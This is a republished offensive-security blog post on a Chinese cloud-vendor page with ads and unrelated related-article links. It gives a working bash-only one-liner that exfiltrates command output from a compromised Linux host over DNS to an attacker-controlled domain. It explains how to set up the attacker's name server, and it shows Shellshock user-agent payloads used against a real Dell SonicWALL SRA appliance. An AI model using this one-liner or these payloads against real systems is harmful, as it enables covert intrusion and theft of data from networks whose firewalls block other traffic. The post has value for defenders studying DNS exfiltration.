Bash data exfiltration through DNS (using bash builtin functions)

本文涉及的产品
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
全局流量管理 GTM,标准版 1个月
云解析 DNS,旗舰版 1个月
简介: https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/Af...

https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/

After gaining ‘blind’ command execution access to a compromised Linux host, data exfiltration can be difficult when the system ibinbash2s protected by a firewall. Sometimes these firewalls prevent the compromised host to establish connections to the internet. In these cases, data exfiltration through the DNS-protocol can be useful. In a lot of cases DNS-queries are not blocked by a firewall.  I’ve had a real life situation like this, which i will describe later on.

There are several oneliners on the internet available to exfiltrate command output through DNS. However, i noticed that these are using Linux applications (xxd, od, hexdump, etc), which are not always present on a minimalistic target system. I decided to create a oneliner, which is only using Bash builtin functionalities. The oneliner can be used whenever command execution is possible and Bash is installed on the compromised system.

I’ve created the following bash command line which can be used on the attacked system to execute commands and send the results through DNS:

(LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1)

In order to use it, first modify the name servers of your domain, point them to the ip-address of the attacker machine. Also two values in the above oneliner need to be changed. The variable “LINE” needs to contain the command to execute, for example “ls -l /”. Also the variable “domain” needs to be modified, replace it with the domain which is pointed to your attacker machine. On the attacker machine, the following server side ruby script can be started:
dns.rb

The script will retrieve the output of the executed command. The following screenshot shows the command executed on a targeted system:

dns_client3

This screenshot shows the retrieved data by the attacker, using the dns.rb script:

dns_server

There might be improvements possible to the oneliner and script to make it more efficient. Or there might be some cases where the oneliner doesn’t work. Do not hesitate to comment on this blog if you have an improvement.

Real life scenario

I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following user-agent, which returned a 200 HTTP response.

User-agent: () { :; }; /bin/ls

sslvpn_200

When sending a user-agent with a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the defined binary):

User-agent () { :;}; /bin/fake

sslvpn_500

I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60), however it was not responding with the command output on commands like ‘ls’. I discovered that all outgoing connections to the internet were blocked by the machine, only the DNS protocol was allowed, by resolving a hostname using the telnet executable. The appliance did not have any executables like xxd, hexdump etc. Therefor i decided to create the above line, which is not depending on these utilities, so can be used on any system containing Bash.

Dell is already aware of the Shellshock vulnerability in the older firmware versions of SRA. More details on how to patch the issue can be found at:

https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series

目录
相关文章
|
4月前
|
JSON API 数据格式
requests库中json参数与data参数使用方法的深入解析
选择 `data`或 `json`取决于你的具体需求,以及服务器端期望接收的数据格式。
340 2
|
6月前
|
JSON 文字识别 数据格式
文本,文识11,解析OCR结果,paddOCR返回的数据,接口返回的数据有code,data,OCR返回是JSON的数据,得到JSON数据先安装依赖,Base64转换工具网站在21.14
文本,文识11,解析OCR结果,paddOCR返回的数据,接口返回的数据有code,data,OCR返回是JSON的数据,得到JSON数据先安装依赖,Base64转换工具网站在21.14
文本,文识11,解析OCR结果,paddOCR返回的数据,接口返回的数据有code,data,OCR返回是JSON的数据,得到JSON数据先安装依赖,Base64转换工具网站在21.14
|
大数据 数据挖掘 BI
几款主流的App统计工具解析:友盟、Talking Data、openinstall
本文简要分析友盟、Talking Data、openinstall的优劣势以及特点,希望能给入门人员一点帮助
5126 0
|
8月前
|
存储 Java 数据库连接
Spring Boot 嵌入式服务器、Hibernate 关系和 Spring Data 全解析
Spring Boot 的嵌入式服务器功能是一项方便而强大的功能,它允许你在应用程序中直接运行 Web 服务器,无需将其部署到单独的独立 Web 服务器中。这使得开发、测试和部署 Web 应用程序变得容易,而且它还是轻量级的、易于启动和停止的,易于配置。
124 0
|
C# Windows
ICSharpCode.SharpZipLib.Zip 解析时报错System.NotSupportedException: No data is available for encoding 936
​ 分析原因 利用ICSharpCode.SharpZipLib.Zip进行APK解析时,因为APK内编译的名称为中文,查询微软开发文档936为gb2312中文编码 [微软开发文档地址](https://docs.microsoft.com/zh-cn/windows/win32/intl/code-page-identifiers "微软开发文档地址") ```csharp // 错误代码 using (ZipInputStream zip = new ZipInputStream(File.OpenRead(path))) { using (var filestream = new
122 0
ICSharpCode.SharpZipLib.Zip 解析时报错System.NotSupportedException: No data is available for encoding 936
|
SQL 存储 缓存
深入解析 RDS Serverless 之 Data API
RDS Serverless Data API 已发布
深入解析 RDS Serverless 之 Data API
|
Web App开发 移动开发 JavaScript
某神奇App data加密算法解析(一)
某神奇App data加密算法解析(一)
某神奇App data加密算法解析(一)
Google Earth Engine ——数据全解析专辑(SRTM Digital Elevation Data Version 4)数字高程数据集
Google Earth Engine ——数据全解析专辑(SRTM Digital Elevation Data Version 4)数字高程数据集
410 0
Google Earth Engine ——数据全解析专辑(SRTM Digital Elevation Data Version 4)数字高程数据集
QR Data Reconstructor-kali下视频和二维码解析
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396736 ...
981 0

相关产品

  • 云解析DNS
  • 推荐镜像

    更多